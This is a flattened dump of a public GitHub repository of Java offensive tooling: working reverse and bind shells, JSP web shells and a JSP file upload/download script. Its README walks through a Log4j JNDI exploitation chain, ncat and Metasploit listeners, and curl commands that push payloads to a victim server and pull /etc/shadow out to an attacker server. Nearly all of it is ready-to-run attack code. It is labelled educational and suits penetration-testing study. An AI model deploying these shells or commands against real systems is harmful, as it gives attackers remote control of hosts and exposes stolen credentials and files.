├── .gitattributes
├── .gitignore
├── LICENSE
├── README.md
├── jar
├── Bind_Shell.jar
└── Reverse_Shell.jar
├── jsp
├── reverse
│ └── jsp_reverse_shell.jsp
└── web
│ ├── files.jsp
│ ├── simple_jsp_web_shell_get.jsp
│ └── simple_jsp_web_shell_post.jsp
├── log4j
├── BindShell.java
└── ReverseShell.java
└── src
├── Bind Shell
├── build.xml
├── manifest.mf
├── nbproject
│ ├── build-impl.xml
│ ├── genfiles.properties
│ ├── project.properties
│ └── project.xml
└── src
│ └── bind
│ └── shell
│ └── BindShell.java
├── Reverse Shell
├── build.xml
├── manifest.mf
├── nbproject
│ ├── build-impl.xml
│ ├── genfiles.properties
│ ├── project.properties
│ └── project.xml
└── src
│ └── reverse
│ └── shell
│ └── ReverseShell.java
└── Web Shell
├── build.xml
├── nbproject
├── ant-deploy.xml
├── build-impl.xml
├── genfiles.properties
├── project.properties
└── project.xml
├── src
└── conf
│ └── MANIFEST.MF
└── web
├── META-INF
└── context.xml
├── WEB-INF
└── web.xml
├── files.jsp
├── index.jsp
├── jsp_reverse_shell.jsp
├── simple_jsp_web_shell_get.jsp
└── simple_jsp_web_shell_post.jsp
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | #NetBeans
2 | **/nbproject/private/
3 | **/nbproject/Makefile-*.mk
4 | **/nbproject/Package-*.bash
5 | build/
6 | nbbuild/
7 | dist/
8 | nbdist/
9 | .nb-gradle/
10 |
11 | # Compiled class file
12 | *.class
13 |
14 | # Log file
15 | *.log
16 |
17 | # BlueJ files
18 | *.ctxt
19 |
20 | # Mobile Tools for Java (J2ME)
21 | .mtj.tmp/
22 |
23 | # Package Files #
24 | *.jar
25 | !/jar/*.jar
26 | *.war
27 | *.nar
28 | *.ear
29 | *.zip
30 | *.tar.gz
31 | *.rar
32 |
33 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
34 | hs_err_pid*
35 |
36 | .gradle
37 | /build/
38 |
39 | # Ignore Gradle GUI config
40 | gradle-app.setting
41 |
42 | # Avoid ignoring Gradle wrapper jar file (.jar files are usually ignored)
43 | !gradle-wrapper.jar
44 |
45 | # Cache of project
46 | .gradletasknamecache
47 |
48 | # # Work around https://youtrack.jetbrains.com/issue/IDEA-116898
49 | # gradle/wrapper/gradle-wrapper.properties
50 | /src/Reverse.Shell/target/
51 |
52 | target/
53 | pom.xml.tag
54 | pom.xml.releaseBackup
55 | pom.xml.versionsBackup
56 | pom.xml.next
57 | release.properties
58 | dependency-reduced-pom.xml
59 | buildNumber.properties
60 | .mvn/timing.properties
61 | .mvn/wrapper/maven-wrapper.jar
62 | /src/Reverse Shell/nbproject/private/
63 | /src/Reverse Shell/build/
64 | /src/Reverse Shell/dist/
65 | /src/Bind Shell/nbproject/private/
66 | /src/Bind Shell/build/
67 | /src/Bind Shell/dist/
68 | /src/Web Shell/nbproject/private/
69 | /src/Web Shell/build/
70 | /src/Web Shell/dist/
71 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 Ivan Šincek
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Java Reverse TCP
2 |
3 | JAR, JSP, and Java files for communicating with a remote host.
4 |
5 | Remote host will have a full control over the client and all the underlying system commands.
6 |
7 | Works on Linux OS and macOS with `/bin/sh` and Windows OS with `cmd.exe`. Program will automatically detect an underlying OS.
8 |
9 | Works with both `ncat` and `multi/handler`.
10 |
11 | Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.
12 |
13 | JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).
14 |
15 | JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 (64-bit).
16 |
17 | Made for educational purposes. I hope it will help!
18 |
19 | ## Table of Contents
20 |
21 | * [JAR Shells](#jar-shells)
22 | * [Log4j Shells](#log4j-shells)
23 | * [JSP Shells](#jsp-shells)
24 | * [JSP Reverse Shell](#jsp-reverse-shell)
25 | * [JSP Web Shells](#jsp-web-shells)
26 | * [JSP File Upload/Download Script](#jsp-file-uploaddownload-script)
27 | * [Case 1: Upload the Script to the Victim’s Server](#case-1-upload-the-script-to-the-victims-server)
28 | * [Case 2: Upload the Script to Your Server](#case-2-upload-the-script-to-your-server)
29 | * [Set Up a Listener](#set-up-a-listener)
30 | * [Runtime](#runtime)
31 |
32 | ## JAR Shells
33 |
34 | Check the source code of JAR files:
35 |
36 | * [/src/Reverse Shell/src/reverse/shell/ReverseShell.java](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Reverse%20Shell/src/reverse/shell/ReverseShell.java)
37 | * [/src/Reverse Shell/src/reverse/shell/BindShell.java](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Bind%20Shell/src/bind/shell/BindShell.java)
38 |
39 | ---
40 |
41 | Open your preferred console from [/jar/](https://github.com/ivan-sincek/java-reverse-tcp/tree/main/jar) and run the following commands:
42 |
43 | ```fundamental
44 | java -jar Reverse_Shell.jar 192.168.8.185 9000
45 |
46 | java -jar Bind_Shell.jar 9000
47 | ```
48 |
49 | ## Log4j Shells
50 |
51 | This PoC was tested on Kali Linux v2021.4 (64-bit).
52 |
53 | **Change the IP address and port number inside the source files as necessary.**
54 |
55 | Open your preferred console from [/log4j/](https://github.com/ivan-sincek/java-reverse-tcp/tree/main/log4j) and run the following commands:
56 |
57 | Compile the source file:
58 |
59 | ```fundamental
60 | javac ReverseShell.java
61 | ```
62 |
63 | Start a local web server from the same directory as the compiled class file (i.e. `ReverseShell.class`):
64 |
65 | ```fundamental
66 | python3 -m http.server 9090
67 |
68 | python3 -m http.server 9090 --directory somedirectory
69 | ```
70 |
71 | Download and build LDAP server:
72 |
73 | ```bash
74 | apt-update && apt-get install maven
75 |
76 | git clone https://github.com/mbechler/marshalsec && cd marshalsec && mvn clean package -DskipTests && cd target
77 | ```
78 |
79 | Start a local LDAP server and create a reference to the compiled class file on your local web server:
80 |
81 | ```fundamental
82 | java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell
83 | ```
84 |
85 | Credits to the author for [marshalsec](https://github.com/mbechler/marshalsec)!
86 |
87 | Give the local LDAP server a public domain with [ngrok](https://ngrok.com):
88 |
89 | ```fundamental
90 | ./ngrok tcp 1389
91 | ```
92 |
93 | Build the JNDI string (obfuscate it however you like):
94 |
95 | ```fundamental
96 | ${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}
97 | ```
98 |
99 | ## JSP Shells
100 |
101 | ### JSP Reverse Shell
102 |
103 | **Change the IP address and port number inside the script as necessary.**
104 |
105 | Copy [/jsp/jsp_reverse_shell.jsp](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Web%20Shell/web/jsp_reverse_shell.jsp) to your projects's root directory or upload it to your target's web server.
106 |
107 | Navigate to the file with your preferred web browser.
108 |
109 | ### JSP Web Shells
110 |
111 | Check the [simple JSP web shell](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Web%20Shell/web/simple_jsp_web_shell_post.jsp) based on HTTP POST request.
112 |
113 | Check the [simple JSP web shell](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Web%20Shell/web/simple_jsp_web_shell_get.jsp) based on HTTP GET request. You must [URL encode](https://www.urlencoder.org) your commands.
114 |
115 | ## JSP File Upload/Download Script
116 |
117 | Check the [simple JSP file upload/download script](https://github.com/ivan-sincek/java-reverse-tcp/blob/main/src/Web%20Shell/web/files.jsp) based on HTTP POST request for file upload and HTTP GET request for file download.
118 |
119 | When downloading a file, you should [URL encode](https://www.urlencoder.org) the file path, and specify name of the output file.
120 |
121 | ### Case 1: Upload the Script to the Victim’s Server
122 |
123 | Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.
124 |
125 | Upload a file to the victim's server web root directory from your PC:
126 |
127 | ```fundamental
128 | curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe
129 | ```
130 |
131 | Download a file from the victim's PC to your PC:
132 |
133 | ```fundamental
134 | curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow
135 | ```
136 |
137 | If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.
138 |
139 | ### Case 2: Upload the Script to Your Server
140 |
141 | From your JSP reverse shell, run the following cURL commands.
142 |
143 | Upload a file from the victim's PC to your server web root directory:
144 |
145 | ```fundamental
146 | curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow
147 | ```
148 |
149 | Download a file from your PC to the victim's PC:
150 |
151 | ```fundamental
152 | curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe
153 |
154 | curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe
155 | ```
156 |
157 | ## Set Up a Listener
158 |
159 | To set up a listener, open your preferred console on Kali Linux and run one of the examples below.
160 |
161 | Set up `ncat` listener:
162 |
163 | ```fundamental
164 | ncat -nvlp 9000
165 | ```
166 |
167 | Set up `multi/handler` listener:
168 |
169 | ```fundamental
170 | msfconsole -q
171 |
172 | use exploit/multi/handler
173 |
174 | set PAYLOAD windows/shell_reverse_tcp
175 |
176 | set LHOST 192.168.8.185
177 |
178 | set LPORT 9000
179 |
180 | exploit
181 | ```
182 |
183 | ## Runtime
184 |
185 | ```fundamental
186 | ┌──(root💀kali)-[~/Desktop]
187 | └─# ncat -nvlp 9000
188 | Ncat: Version 7.93 ( https://nmap.org/ncat )
189 | Ncat: Listening on :::9000
190 | Ncat: Listening on 0.0.0.0:9000
191 | Ncat: Connection from 192.168.1.117.
192 | Ncat: Connection from 192.168.1.117:49895.
193 | Microsoft Windows [Version 10.0.18363.1556]
194 | (c) 2019 Microsoft Corporation. All rights reserved.
195 |
196 | C:\Users\W10\Desktop\Reverse Shell>whoami
197 | desktop-4kniu10\w10
198 |
199 | C:\Users\W10\Desktop\Reverse Shell>ver
200 |
201 | Microsoft Windows [Version 10.0.18363.1556]
202 |
203 | C:\Users\W10\Desktop\Reverse Shell>
204 | ```
205 |
--------------------------------------------------------------------------------
/jar/Bind_Shell.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ivan-sincek/java-reverse-tcp/3815e5daa227d1aa42f489702cff374adb1517bd/jar/Bind_Shell.jar
--------------------------------------------------------------------------------
/jar/Reverse_Shell.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ivan-sincek/java-reverse-tcp/3815e5daa227d1aa42f489702cff374adb1517bd/jar/Reverse_Shell.jar
--------------------------------------------------------------------------------
/jsp/reverse/jsp_reverse_shell.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.net.SocketTimeoutException"%>
2 | <%@page import="java.util.Arrays"%>
3 | <%@page import="java.net.Socket"%>
4 | <%@page import="java.io.IOException"%>
5 | <%@page import="java.io.OutputStream"%>
6 | <%@page import="java.io.InputStream"%>
7 | <%@page import="java.net.InetSocketAddress"%>
8 |
9 | <%-- Copyright (c) 2021 Ivan Šincek --%>
10 | <%-- v3.0 --%>
11 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
12 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
13 |
14 | <%!
15 | public class ReverseShell {
16 |
17 | private InetSocketAddress addr = null;
18 | private String os = null;
19 | private String shell = null;
20 | private byte[] buffer = null;
21 | private int clen = 0;
22 | private boolean error = false;
23 | private String message = null;
24 |
25 | public ReverseShell(String addr, int port) {
26 | this.addr = new InetSocketAddress(addr, port);
27 | }
28 |
29 | private boolean detect() {
30 | boolean detected = true;
31 | this.os = System.getProperty("os.name").toUpperCase();
32 | if (this.os.contains("LINUX") || this.os.contains("MAC")) {
33 | this.os = "LINUX";
34 | this.shell = "/bin/sh";
35 | } else if (this.os.contains("WIN")) {
36 | this.os = "WINDOWS";
37 | this.shell = "cmd.exe";
38 | } else {
39 | detected = false;
40 | this.message = "SYS_ERROR: Underlying operating system is not supported, program will now exit...\n";
41 | }
42 | return detected;
43 | }
44 |
45 | private String getMessage() {
46 | return this.message;
47 | }
48 |
49 | // strings in Java are immutable, so we need to avoid using them to minimize the data in memory
50 | private void brw(InputStream input, OutputStream output, String iname, String oname) {
51 | int bytes = 0;
52 | try {
53 | do {
54 | if (this.os.equals("WINDOWS") && iname.equals("STDOUT") && this.clen > 0) {
55 | // for some reason Windows OS pipes STDIN into STDOUT
56 | // we do not like that
57 | // we need to discard the data from the stream
58 | do {
59 | bytes = input.read(this.buffer, 0, this.clen >= this.buffer.length ? this.buffer.length : this.clen);
60 | this.clen -= this.clen >= this.buffer.length ? this.buffer.length : this.clen;
61 | } while (bytes > 0 && this.clen > 0);
62 | } else {
63 | bytes = input.read(this.buffer, 0, this.buffer.length);
64 | if (bytes > 0) {
65 | output.write(this.buffer, 0, bytes);
66 | output.flush();
67 | if (this.os.equals("WINDOWS") && oname.equals("STDIN")) {
68 | this.clen += bytes;
69 | }
70 | } else if (iname.equals("SOCKET")) {
71 | this.error = true;
72 | this.message = "SOC_ERROR: Shell connection has been terminated\n";
73 | }
74 | }
75 | } while (input.available() > 0);
76 | } catch (SocketTimeoutException ex) {} catch (IOException ex) {
77 | this.error = true;
78 | this.message = String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n", iname, oname);
79 | }
80 | }
81 |
82 | public void run() {
83 | if (this.detect()) {
84 | Socket client = null;
85 | OutputStream socin = null;
86 | InputStream socout = null;
87 |
88 | Process process = null;
89 | OutputStream stdin = null;
90 | InputStream stdout = null;
91 | InputStream stderr = null;
92 |
93 | try {
94 | client = new Socket();
95 | client.setSoTimeout(100);
96 | client.connect(this.addr);
97 | socin = client.getOutputStream();
98 | socout = client.getInputStream();
99 |
100 | this.buffer = new byte[1024];
101 |
102 | process = new ProcessBuilder(this.shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
103 | stdin = process.getOutputStream();
104 | stdout = process.getInputStream();
105 | stderr = process.getErrorStream();
106 |
107 | do {
108 | if (!process.isAlive()) {
109 | this.message = "PROC_ERROR: Shell process has been terminated\n"; break;
110 | }
111 | this.brw(socout, stdin, "SOCKET", "STDIN");
112 | if (stderr.available() > 0) { this.brw(stderr, socin, "STDERR", "SOCKET"); }
113 | if (stdout.available() > 0) { this.brw(stdout, socin, "STDOUT", "SOCKET"); }
114 | } while (!this.error);
115 | } catch (IOException ex) {
116 | this.message = String.format("ERROR: %s\n", ex.getMessage());
117 | } finally {
118 | if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
119 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
120 | if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
121 | if (process != null) { process.destroy(); }
122 |
123 | if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
124 | if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
125 | if (client != null) { try { client.close(); } catch (IOException ex) {} }
126 |
127 | if (this.buffer != null) { Arrays.fill(this.buffer, (byte)0); }
128 | }
129 | }
130 | }
131 | }
132 | %>
133 |
134 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
135 |
136 | <%
137 | out.print("");
138 | // change the host address and/or port number as necessary
139 | ReverseShell sh = new ReverseShell("127.0.0.1", 9000);
140 | sh.run();
141 | if (sh.getMessage() != null) { out.print(sh.getMessage()); }
142 | sh = null;
143 | System.gc();
144 | out.print("");
145 | %>
146 |
--------------------------------------------------------------------------------
/jsp/web/files.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.nio.file.Files"%>
2 | <%@page import="java.nio.file.Paths"%>
3 | <%@page import="java.io.File"%>
4 | <%@page import="org.apache.tomcat.util.http.fileupload.FileItem"%>
5 | <%@page import="org.apache.tomcat.util.http.fileupload.servlet.ServletRequestContext"%>
6 | <%@page import="org.apache.tomcat.util.http.fileupload.servlet.ServletFileUpload"%>
7 | <%@page import="org.apache.tomcat.util.http.fileupload.disk.DiskFileItemFactory"%>
8 |
9 | <%@page import="java.util.Iterator"%>
10 | <%-- Copyright (c) 2021 Ivan Šincek --%>
11 | <%-- v3.0 --%>
12 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
13 |
14 | <%-- modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell --%>
15 | <%-- don't forget to change the script name in the action attribute --%>
16 | <%-- when downloading a file, you should URL encode the file path --%>
17 |
18 | <%
19 | // your parameter/key here
20 | String parameter = "file";
21 | String output = "";
22 | if (request.getMethod() == "POST" && request.getContentType() != null && request.getContentType().startsWith("multipart/form-data")) {
23 | Iterator files = new ServletFileUpload(new DiskFileItemFactory()).parseRequest(new ServletRequestContext(request)).iterator();
24 | while (files.hasNext()) {
25 | FileItem file = (FileItem)files.next();
26 | if (file.getFieldName().equals(parameter)) {
27 | try {
28 | output = file.getName();
29 | int pos = output.lastIndexOf(File.separator);
30 | if (pos >= 0) {
31 | output = output.substring(pos + 1);
32 | }
33 | output = System.getProperty("user.dir") + File.separator + output;
34 | file.write(new File(output));
35 | output = String.format("SUCCESS: File was uploaded to '%s'\n", output);
36 | } catch (Exception ex) {
37 | output = String.format("ERROR: %s\n", ex.getMessage());
38 | }
39 | }
40 | file = null;
41 | }
42 | files = null;
43 | }
44 | if (request.getMethod() == "GET" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
45 | try {
46 | output = request.getParameter(parameter).trim();
47 | response.setHeader("Content-Type", "application/octet-stream");
48 | response.setHeader("Content-Disposition", String.format("attachment; filename=\"%s\"", Paths.get(output).getFileName()));
49 | response.getOutputStream().write(Files.readAllBytes(Paths.get(output)));
50 | response.getOutputStream().flush();
51 | response.getOutputStream().close();
52 | } catch (Exception ex) {
53 | output = String.format("ERROR: %s\n", ex.getMessage());
54 | }
55 | }
56 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
57 | // out.print("" + output + "
"); output = null; System.gc();
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | JSP File Upload/Download
66 |
67 |
68 |
69 |
70 |
74 | <% out.print(output); output = null; System.gc(); %>
75 |
76 |
77 |
--------------------------------------------------------------------------------
/jsp/web/simple_jsp_web_shell_get.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.util.Arrays"%>
2 | <%@page import="java.io.IOException"%>
3 | <%@page import="java.nio.charset.StandardCharsets"%>
4 | <%@page import="java.io.InputStream"%>
5 |
6 | <%-- Copyright (c) 2021 Ivan Šincek --%>
7 | <%-- v3.0 --%>
8 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
9 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
10 |
11 | <%-- modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell --%>
12 | <%-- you must URL encode your commands --%>
13 |
14 | <%
15 | // your parameter/key here
16 | String parameter = "command";
17 | String output = "";
18 | if (request.getMethod() == "GET" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
19 | String os = System.getProperty("os.name").toUpperCase();
20 | String shell = null;
21 | if (os.contains("LINUX") || os.contains("MAC")) {
22 | shell = "/bin/sh -c";
23 | } else if (os.contains("WIN")) {
24 | shell = "cmd.exe /c";
25 | } else {
26 | output = "SYS_ERROR: Underlying operating system is not supported\n";
27 | }
28 | if (shell != null) {
29 | Process process = null;
30 | InputStream stdout = null;
31 | byte[] buffer = null;
32 |
33 | try {
34 | process = Runtime.getRuntime().exec(String.format("%s \"(%s) 2>&1\"", shell, request.getParameter(parameter).trim()));
35 | stdout = process.getInputStream();
36 | buffer = new byte[1024];
37 |
38 | int bytes = 0;
39 | do {
40 | bytes = stdout.read(buffer, 0, buffer.length);
41 | if (bytes > 0) {
42 | output += new String(buffer, 0, bytes, StandardCharsets.UTF_8);
43 | }
44 | } while (bytes > 0);
45 | output = output.replace("<", "<");
46 | output = output.replace(">", ">");
47 | } catch (IOException ex) {
48 | output = String.format("ERROR: %s\n", ex);
49 | } finally {
50 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} stdout = null; }
51 | if (process != null) { process.destroy(); process = null; }
52 | if (buffer != null) { Arrays.fill(buffer, (byte)0); buffer = null; }
53 | }
54 | }
55 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
56 | // out.print("" + output + "
"); output = null; System.gc();
57 | }
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | Simple JSP Web Shell
66 |
67 |
68 |
69 |
70 | <% out.print(output); output = null; System.gc(); %>
71 |
72 |
73 |
--------------------------------------------------------------------------------
/jsp/web/simple_jsp_web_shell_post.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.util.Arrays"%>
2 | <%@page import="java.io.IOException"%>
3 | <%@page import="java.nio.charset.StandardCharsets"%>
4 | <%@page import="java.io.InputStream"%>
5 |
6 | <%-- Copyright (c) 2021 Ivan Šincek --%>
7 | <%-- v3.0 --%>
8 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
9 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
10 |
11 | <%-- modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell --%>
12 | <%-- don't forget to change the script name in the action attribute --%>
13 |
14 | <%
15 | // your parameter/key here
16 | String parameter = "command";
17 | String output = "";
18 | if (request.getMethod() == "POST" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
19 | String os = System.getProperty("os.name").toUpperCase();
20 | String shell = null;
21 | if (os.contains("LINUX") || os.contains("MAC")) {
22 | shell = "/bin/sh -c";
23 | } else if (os.contains("WIN")) {
24 | shell = "cmd.exe /c";
25 | } else {
26 | output = "SYS_ERROR: Underlying operating system is not supported\n";
27 | }
28 | if (shell != null) {
29 | Process process = null;
30 | InputStream stdout = null;
31 | byte[] buffer = null;
32 |
33 | try {
34 | process = Runtime.getRuntime().exec(String.format("%s \"(%s) 2>&1\"", shell, request.getParameter(parameter).trim()));
35 | stdout = process.getInputStream();
36 | buffer = new byte[1024];
37 |
38 | int bytes = 0;
39 | do {
40 | bytes = stdout.read(buffer, 0, buffer.length);
41 | if (bytes > 0) {
42 | output += new String(buffer, 0, bytes, StandardCharsets.UTF_8);
43 | }
44 | } while (bytes > 0);
45 | output = output.replace("<", "<");
46 | output = output.replace(">", ">");
47 | } catch (IOException ex) {
48 | output = String.format("ERROR: %s\n", ex);
49 | } finally {
50 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} stdout = null; }
51 | if (process != null) { process.destroy(); process = null; }
52 | if (buffer != null) { Arrays.fill(buffer, (byte)0); buffer = null; }
53 | }
54 | }
55 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
56 | // out.print("" + output + "
"); output = null; System.gc();
57 | }
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | Simple JSP Web Shell
66 |
67 |
68 |
69 |
70 |
73 | <% out.print(output); output = null; System.gc(); %>
74 |
75 |
76 |
--------------------------------------------------------------------------------
/log4j/BindShell.java:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2021 Ivan Šincek
2 | // v2.9
3 | // Requires Java SE v8 or greater and JDK v8 or greater.
4 | // Works on Linux OS, macOS, and Windows OS.
5 |
6 | import java.io.IOException;
7 | import java.io.InputStream;
8 | import java.io.OutputStream;
9 | import java.net.ServerSocket;
10 | import java.net.Socket;
11 | import java.net.SocketTimeoutException;
12 | import java.util.Arrays;
13 |
14 | public class BindShell {
15 |
16 | // change the port number as necessary
17 | private static int port = 9000;
18 | private static String os = null;
19 | private static String shell = null;
20 | private static byte[] buffer = null;
21 | private static int clen = 0;
22 | private static boolean error = false;
23 |
24 | private static boolean detect() {
25 | boolean detected = true;
26 | os = System.getProperty("os.name").toUpperCase();
27 | if (os.contains("LINUX") || os.contains("MAC")) {
28 | os = "LINUX";
29 | shell = "/bin/sh";
30 | } else if (os.contains("WIN")) {
31 | os = "WINDOWS";
32 | shell = "cmd.exe";
33 | } else {
34 | detected = false;
35 | System.out.print("SYS_ERROR: Underlying operating system is not supported, program will now exit...\n");
36 | }
37 | return detected;
38 | }
39 |
40 | // strings in Java are immutable, so we need to avoid using them to minimize the data in memory
41 | private static void brw(InputStream input, OutputStream output, String iname, String oname) {
42 | int bytes = 0;
43 | try {
44 | do {
45 | if (os.equals("WINDOWS") && iname.equals("STDOUT") && clen > 0) {
46 | // for some reason Windows OS pipes STDIN into STDOUT
47 | // we do not like that
48 | // we need to discard the data from the stream
49 | do {
50 | bytes = input.read(buffer, 0, clen >= buffer.length ? buffer.length : clen);
51 | clen -= clen >= buffer.length ? buffer.length : clen;
52 | } while (bytes > 0 && clen > 0);
53 | } else {
54 | bytes = input.read(buffer, 0, buffer.length);
55 | if (bytes > 0) {
56 | output.write(buffer, 0, bytes);
57 | output.flush();
58 | if (os.equals("WINDOWS") && oname.equals("STDIN")) {
59 | clen += bytes;
60 | }
61 | } else if (iname.equals("SOCKET")) {
62 | error = true;
63 | System.out.print("SOC_ERROR: Shell connection has been terminated\n\n");
64 | }
65 | }
66 | } while (input.available() > 0);
67 | } catch (SocketTimeoutException ex) {} catch (IOException ex) {
68 | error = true;
69 | System.out.print(String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n\n", iname, oname));
70 | }
71 | }
72 |
73 | public static void run() {
74 | if (detect()) {
75 | ServerSocket listener = null;
76 |
77 | Socket client = null;
78 | OutputStream socin = null;
79 | InputStream socout = null;
80 |
81 | Process process = null;
82 | OutputStream stdin = null;
83 | InputStream stdout = null;
84 | InputStream stderr = null;
85 |
86 | System.out.print("Backdoor is up and running...\n\n");
87 | System.out.print("Waiting for client to connect...\n\n");
88 | try {
89 | listener = new ServerSocket(port);
90 | do {
91 | client = listener.accept();
92 | } while (client == null);
93 | client.setSoTimeout(100);
94 | socin = client.getOutputStream();
95 | socout = client.getInputStream();
96 |
97 | buffer = new byte[1024];
98 |
99 | process = new ProcessBuilder(shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
100 | stdin = process.getOutputStream();
101 | stdout = process.getInputStream();
102 | stderr = process.getErrorStream();
103 |
104 | System.out.print("Client has connected!\n\n");
105 | do {
106 | if (!process.isAlive()) {
107 | System.out.print("PROC_ERROR: Shell process has been terminated\n\n"); break;
108 | }
109 | brw(socout, stdin, "SOCKET", "STDIN");
110 | if (stderr.available() > 0) { brw(stderr, socin, "STDERR", "SOCKET"); }
111 | if (stdout.available() > 0) { brw(stdout, socin, "STDOUT", "SOCKET"); }
112 | } while (!error);
113 | System.out.print("Client has disconnected!\n");
114 | } catch (IOException ex) {
115 | System.out.print(String.format("ERROR: %s\n", ex.getMessage()));
116 | } finally {
117 | if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
118 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
119 | if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
120 | if (process != null) { process.destroy(); }
121 |
122 | if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
123 | if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
124 | if (client != null) { try { client.close(); } catch (IOException ex) {} }
125 |
126 | if (buffer != null) { Arrays.fill(buffer, (byte)0); }
127 |
128 | if (listener != null) { try { listener.close(); } catch (IOException ex) {} }
129 | }
130 | }
131 | }
132 |
133 | static {
134 | run();
135 | System.gc();
136 | }
137 |
138 | }
139 |
--------------------------------------------------------------------------------
/log4j/ReverseShell.java:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2021 Ivan Šincek
2 | // v2.9
3 | // Requires Java SE v8 or greater and JDK v8 or greater.
4 | // Works on Linux OS, macOS, and Windows OS.
5 |
6 | import java.io.IOException;
7 | import java.io.InputStream;
8 | import java.io.OutputStream;
9 | import java.net.InetSocketAddress;
10 | import java.net.Socket;
11 | import java.net.SocketTimeoutException;
12 | import java.util.Arrays;
13 |
14 | public class ReverseShell {
15 |
16 | // change the host address and/or port number as necessary
